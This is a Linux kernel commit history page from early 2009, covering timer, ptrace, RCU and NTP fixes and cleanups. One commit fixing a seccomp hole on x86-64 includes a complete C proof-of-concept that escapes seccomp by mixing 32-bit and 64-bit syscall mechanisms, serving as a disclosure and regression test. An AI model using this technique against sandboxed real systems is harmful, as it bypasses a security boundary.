1. 08 4月, 2009 1 次提交
  2. 02 4月, 2009 1 次提交
    • R
      timers: add missing kernel-doc · 633fe795
      Randy Dunlap 提交于
      Add missing kernel-doc parameter notation and change function
      name to its new name:
      
        Warning(kernel/timer.c:543): No description found for parameter 'name'
        Warning(kernel/timer.c:543): No description found for parameter 'key'
      Signed-off-by: NRandy Dunlap <randy.dunlap@oracle.com>
      Cc: akpm <akpm@linux-foundation.org>
      Cc: Johannes Berg <johannes@sipsolutions.net>
      LKML-Reference: <20090401174723.f0bea0eb.randy.dunlap@oracle.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      633fe795
  3. 24 3月, 2009 2 次提交
    • O
      posix timers: fix RLIMIT_CPU && fork() · 37bebc70
      Oleg Nesterov 提交于
      See http://bugzilla.kernel.org/show_bug.cgi?id=12911
      
      copy_signal() copies signal->rlim, but RLIMIT_CPU is "lost". Because
      posix_cpu_timers_init_group() sets cputime_expires.prof_exp = 0 and thus
      fastpath_timer_check() returns false unless we have other cpu timers.
      
      This is the minimal fix for 2.6.29 (tested) and 2.6.28. The patch is not
      optimal, we need further cleanups here. With this patch update_rlimit_cpu()
      is not really needed, but I don't think it should be removed.
      
      The proper fix (I think) is:
      
      	- set_process_cpu_timer() should just start the cputimer->running
      	  logic (it does), no need to change cputime_expires.xxx_exp
      
      	- posix_cpu_timers_init_group() should set ->running when needed
      
      	- fastpath_timer_check() can check ->running instead of
      	  task_cputime_zero(signal->cputime_expires)
      Reported-by: NPeter Lojkin <ia6432@inbox.ru>
      Signed-off-by: NOleg Nesterov <oleg@redhat.com>
      Cc: Peter Zijlstra <peterz@infradead.org>
      Cc: Roland McGrath <roland@redhat.com>
      Cc: <stable@kernel.org> [for 2.6.29.x]
      LKML-Reference: <20090323193411.GA17514@redhat.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      37bebc70
    • M
      fix ptrace slowness · 53da1d94
      Miklos Szeredi 提交于
      This patch fixes bug #12208:
      
        Bug-Entry       : http://bugzilla.kernel.org/show_bug.cgi?id=12208
        Subject         : uml is very slow on 2.6.28 host
      
      This turned out to be not a scheduler regression, but an already
      existing problem in ptrace being triggered by subtle scheduler
      changes.
      
      The problem is this:
      
       - task A is ptracing task B
       - task B stops on a trace event
       - task A is woken up and preempts task B
       - task A calls ptrace on task B, which does ptrace_check_attach()
       - this calls wait_task_inactive(), which sees that task B is still on the runq
       - task A goes to sleep for a jiffy
       - ...
      
      Since UML does lots of the above sequences, those jiffies quickly add
      up to make it slow as hell.
      
      This patch solves this by not rescheduling in read_unlock() after
      ptrace_stop() has woken up the tracer.
      
      Thanks to Oleg Nesterov and Ingo Molnar for the feedback.
      Signed-off-by: NMiklos Szeredi <mszeredi@suse.cz>
      CC: stable@kernel.org
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      53da1d94
  4. 18 3月, 2009 1 次提交
  5. 11 3月, 2009 1 次提交
  6. 10 3月, 2009 1 次提交
  7. 09 3月, 2009 1 次提交
    • H
      Fix fixpoint divide exception in acct_update_integrals · 6d5b5acc
      Heiko Carstens 提交于
      Frans Pop reported the crash below when running an s390 kernel under Hercules:
      
        Kernel BUG at 000738b4  verbose debug info unavailable!
        fixpoint divide exception: 0009  #1! SMP
        Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx
           cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot
           dm_mod dasd_eckd_mod dasd_mod
        CPU: 0 Not tainted 2.6.27.19 #13
        Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18)
        Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118)
                   R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0
        Krnl GPRS: 00000000 000007d0 7fffffff fffff830
                   00000000 ffffffff 00000002 0f9ed9b8
                   00000000 00008ca0 00000000 0f9ed9b8
                   0f9edda4 8007386e 0f4f7ec8 0f4f7e98
        Krnl Code: 800738aa: a71807d0         lhi     %r1,2000
                   800738ae: 8c200001         srdl    %r2,1
                   800738b2: 1d21             dr      %r2,%r1
                  >800738b4: 5810d10e         l       %r1,270(%r13)
                   800738b8: 1823             lr      %r2,%r3
                   800738ba: 4130f060         la      %r3,96(%r15)
                   800738be: 0de1             basr    %r14,%r1
                   800738c0: 5800f060         l       %r0,96(%r15)
        Call Trace:
        ( <000000000004fdea>! blocking_notifier_call_chain+0x1e/0x2c)
          <0000000000038502>! do_exit+0x106/0x7c0
          <0000000000038c36>! do_group_exit+0x7a/0xb4
          <0000000000038c8e>! SyS_exit_group+0x1e/0x30
          <0000000000021c28>! sysc_do_restart+0x12/0x16
          <0000000077e7e924>! 0x77e7e924
      
      Reason for this is that cpu time accounting usually only happens from
      interrupt context, but acct_update_integrals gets also called from
      process context with interrupts enabled.
      
      So in acct_update_integrals we may end up with the following scenario:
      
      Between reading tsk->stime/tsk->utime and tsk->acct_timexpd an interrupt
      happens which updates accouting values.  This causes acct_timexpd to be
      greater than the former stime + utime.  The subsequent calculation of
      
      	dtime = cputime_sub(time, tsk->acct_timexpd);
      
      will be negative and the division performed by
      
      	cputime_to_jiffies(dtime)
      
      will generate an exception since the result won't fit into a 32 bit
      register.
      
      In order to fix this just always disable interrupts while accessing any
      of the accounting values.
      
      Reported by: Frans Pop <elendil@planet.nl>
      Tested by: Frans Pop <elendil@planet.nl>
      Cc: stable@kernel.org
      Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
      Signed-off-by: NHeiko Carstens <heiko.carstens@de.ibm.com>
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      6d5b5acc
  8. 05 3月, 2009 1 次提交
  9. 03 3月, 2009 1 次提交
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  10. 28 2月, 2009 1 次提交
  11. 27 2月, 2009 2 次提交
  12. 26 2月, 2009 16 次提交
    • H
      sched_rt: don't start timer when rt bandwidth disabled · cac64d00
      Hiroshi Shimamoto 提交于
      Impact: fix incorrect condition check
      
      No need to start rt bandwidth timer when rt bandwidth is disabled.
      If this timer starts, it may stop at sched_rt_period_timer() on the first time.
      Signed-off-by: NHiroshi Shimamoto <h-shimamoto@ct.jp.nec.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      cac64d00
    • P
      rcu: Teach RCU that idle task is not quiscent state at boot · a6826048
      Paul E. McKenney 提交于
      This patch fixes a bug located by Vegard Nossum with the aid of
      kmemcheck, updated based on review comments from Nick Piggin,
      Ingo Molnar, and Andrew Morton.  And cleans up the variable-name
      and function-name language.  ;-)
      
      The boot CPU runs in the context of its idle thread during boot-up.
      During this time, idle_cpu(0) will always return nonzero, which will
      fool Classic and Hierarchical RCU into deciding that a large chunk of
      the boot-up sequence is a big long quiescent state.  This in turn causes
      RCU to prematurely end grace periods during this time.
      
      This patch changes the rcutree.c and rcuclassic.c rcu_check_callbacks()
      function to ignore the idle task as a quiescent state until the
      system has started up the scheduler in rest_init(), introducing a
      new non-API function rcu_idle_now_means_idle() to inform RCU of this
      transition.  RCU maintains an internal rcu_idle_cpu_truthful variable
      to track this state, which is then used by rcu_check_callback() to
      determine if it should believe idle_cpu().
      
      Because this patch has the effect of disallowing RCU grace periods
      during long stretches of the boot-up sequence, this patch also introduces
      Josh Triplett's UP-only optimization that makes synchronize_rcu() be a
      no-op if num_online_cpus() returns 1.  This allows boot-time code that
      calls synchronize_rcu() to proceed normally.  Note, however, that RCU
      callbacks registered by call_rcu() will likely queue up until later in
      the boot sequence.  Although rcuclassic and rcutree can also use this
      same optimization after boot completes, rcupreempt must restrict its
      use of this optimization to the portion of the boot sequence before the
      scheduler starts up, given that an rcupreempt RCU read-side critical
      section may be preeempted.
      
      In addition, this patch takes Nick Piggin's suggestion to make the
      system_state global variable be __read_mostly.
      
      Changes since v4:
      
      o	Changes the name of the introduced function and variable to
      	be less emotional.  ;-)
      
      Changes since v3:
      
      o	WARN_ON(nr_context_switches() > 0) to verify that RCU
      	switches out of boot-time mode before the first context
      	switch, as suggested by Nick Piggin.
      
      Changes since v2:
      
      o	Created rcu_blocking_is_gp() internal-to-RCU API that
      	determines whether a call to synchronize_rcu() is itself
      	a grace period.
      
      o	The definition of rcu_blocking_is_gp() for rcuclassic and
      	rcutree checks to see if but a single CPU is online.
      
      o	The definition of rcu_blocking_is_gp() for rcupreempt
      	checks to see both if but a single CPU is online and if
      	the system is still in early boot.
      
      	This allows rcupreempt to again work correctly if running
      	on a single CPU after booting is complete.
      
      o	Added check to rcupreempt's synchronize_sched() for there
      	being but one online CPU.
      
      Tested all three variants both SMP and !SMP, booted fine, passed a short
      rcutorture test on both x86 and Power.
      Located-by: NVegard Nossum <vegard.nossum@gmail.com>
      Tested-by: NVegard Nossum <vegard.nossum@gmail.com>
      Tested-by: NPaul E. McKenney <paulmck@linux.vnet.ibm.com>
      Signed-off-by: NPaul E. McKenney <paulmck@linux.vnet.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      a6826048
    • I
      time: ntp: clean up second_overflow() · 39854fe8
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      The 'time_adj' local variable is named in a very confusing
      way because it almost shadows the 'time_adjust' global
      variable - which is used in this same function.
      
      Rename it to 'delta' - to make them stand apart more clearly.
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2545	    114	    144	   2803	    af3	ntp.o.before
         2545	    114	    144	   2803	    af3	ntp.o.after
      
      md5:
         1bf0b3be564512279ba7cee299d1d2be  ntp.o.before.asm
         1bf0b3be564512279ba7cee299d1d2be  ntp.o.after.asm
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      39854fe8
    • I
      time: ntp: simplify ntp_tick_adj calculations · 069569e0
      Ingo Molnar 提交于
      Impact: micro-optimization
      
      Convert the (internal) ntp_tick_adj value we store from unscaled
      units to scaled units. This is a constant that we never modify,
      so scaling it up once during bootup is enough - we dont have to
      do it for every adjustment step.
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      069569e0
    • I
      time: ntp: make 64-bit constants more robust · 2b9d1496
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
       - make PPM_SCALE an explicit s64 constant, to
         remove (s64) casts from usage sites.
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2536	    114	    136	   2786	    ae2	ntp.o.before
         2536	    114	    136	   2786	    ae2	ntp.o.after
      
      md5:
         40a7728d1188aa18e83e21a81fa7b150  ntp.o.before.asm
         40a7728d1188aa18e83e21a81fa7b150  ntp.o.after.asm
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      2b9d1496
    • I
      time: ntp: refactor do_adjtimex() some more · e9629165
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      Further simplify do_adjtimex():
      
       - introduce the ntp_start_leap_timer() helper function
       - eliminate the goto adj_done complication
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      e9629165
    • I
      time: ntp: refactor do_adjtimex() · 80f22571
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      do_adjtimex() is currently a monster function with a maze of
      branches. Refactor the txc->modes setting aspects of it into
      two new helper functions:
      
      	process_adj_status()
      	process_adjtimex_modes()
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2512	    114	    136	   2762	    aca	ntp.o.before
         2512	    114	    136	   2762	    aca	ntp.o.after
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      80f22571
    • I
      time: ntp: fix bug in ntp_update_offset() & do_adjtimex() · 10dd31a7
      Ingo Molnar 提交于
      Impact: change (fix) the way the NTP PLL seconds offset is initialized/tracked
      
      Fix a bug and do a micro-optimization:
      
      When PLL is enabled we do not reset time_reftime. If the PLL
      was off for a long time (for example after bootup), this is
      arguably the wrong thing to do.
      
      We already had a hack for the common boot-time case in
      ntp_update_offset(), in form of:
      
      	if (unlikely(time_status & STA_FREQHOLD || time_reftime == 0))
       		secs = 0;
      
      But the update delta should be reset later on too - not just when
      the PLL is enabled for the first time after bootup.
      
      So do it on !STA_PLL -> STA_PLL transitions.
      
      This changes behavior, as previously if ntpd was disabled for
      a long time and we restarted it, we'd run from that last update,
      with a very large delta.
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      10dd31a7
    • I
      time: ntp: micro-optimize ntp_update_offset() · c7986acb
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      The time_reftime update in ntp_update_offset() to xtime.tv_sec
      is a convoluted way of saying that we want to freeze the frequency
      and want the 'secs' delta to be 0. Also make this branch unlikely.
      
      This shaves off 8 bytes from the code size:
      
         text	   data	    bss	    dec	    hex	filename
         2504	    114	    136	   2754	    ac2	ntp.o.before
         2496	    114	    136	   2746	    aba	ntp.o.after
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      c7986acb
    • I
      time: ntp: simplify ntp_update_offset_fll() · 478b7aab
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      Change ntp_update_offset_fll() to delta logic instead of
      absolute value logic. This eliminates 'freq_adj' from the
      function.
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      478b7aab
    • I
      time: ntp: refactor and clean up ntp_update_offset() · f939890b
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      - introduce the ntp_update_offset_fll() helper
      - clean up the flow and variable naming
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2504	    114	    136	   2754	    ac2	ntp.o.before
         2504	    114	    136	   2754	    ac2	ntp.o.after
      
      md5:
         01f7b8e1a5472a3056f9e4ae84d46315  ntp.o.before.asm
         01f7b8e1a5472a3056f9e4ae84d46315  ntp.o.after.asm
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      f939890b
    • I
      time: ntp: refactor up ntp_update_frequency() · bc26c31d
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      Change ntp_update_frequency() from a hard to follow code
      flow that uses global variables as temporaries, to a clean
      input+output flow.
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      bc26c31d
    • I
      time: ntp: clean up ntp_update_frequency() · 9ce616aa
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      Prepare a refactoring of ntp_update_frequency().
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2504	    114	    136	   2754	    ac2	ntp.o.before
         2504	    114	    136	   2754	    ac2	ntp.o.after
      
      md5:
         41f3009debc9b397d7394dd77d912f0a  ntp.o.before.asm
         41f3009debc9b397d7394dd77d912f0a  ntp.o.after.asm
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      9ce616aa
    • I
      time: ntp: simplify the MAX_TICKADJ_SCALED definition · bbd12676
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      There's an ugly u64 typecase in the MAX_TICKADJ_SCALED definition,
      this can be eliminated by making the MAX_TICKADJ constant's type
      64-bit (signed).
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2504	    114	    136	   2754	    ac2	ntp.o.before
         2504	    114	    136	   2754	    ac2	ntp.o.after
      
      md5:
         41f3009debc9b397d7394dd77d912f0a  ntp.o.before.asm
         41f3009debc9b397d7394dd77d912f0a  ntp.o.after.asm
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      bbd12676
    • I
      time: ntp: simplify the second_overflow() code flow · 3c972c24
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      Instead of a hierarchy of conditions, transform them to clean
      gradual conditions and return's.
      
      This makes the flow easier to read and makes the purpose of
      the function easier to understand.
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2552	    170	    168	   2890	    b4a	ntp.o.before
         2552	    170	    168	   2890	    b4a	ntp.o.after
      
      md5:
         eae1275df0b7d6290c13f6f6f8f05c8c  ntp.o.before.asm
         eae1275df0b7d6290c13f6f6f8f05c8c  ntp.o.after.asm
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      3c972c24
    • I
      time: ntp: clean up kernel/time/ntp.c · 53bbfa9e
      Ingo Molnar 提交于
      Impact: cleanup, no functionality changed
      
      Make this file a bit more readable by applying a consistent coding style.
      
      No code changed:
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2552	    170	    168	   2890	    b4a	ntp.o.before
         2552	    170	    168	   2890	    b4a	ntp.o.after
      
      md5:
         eae1275df0b7d6290c13f6f6f8f05c8c  ntp.o.before.asm
         eae1275df0b7d6290c13f6f6f8f05c8c  ntp.o.after.asm
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      53bbfa9e
  13. 23 2月, 2009 1 次提交
  14. 22 2月, 2009 5 次提交
  15. 19 2月, 2009 5 次提交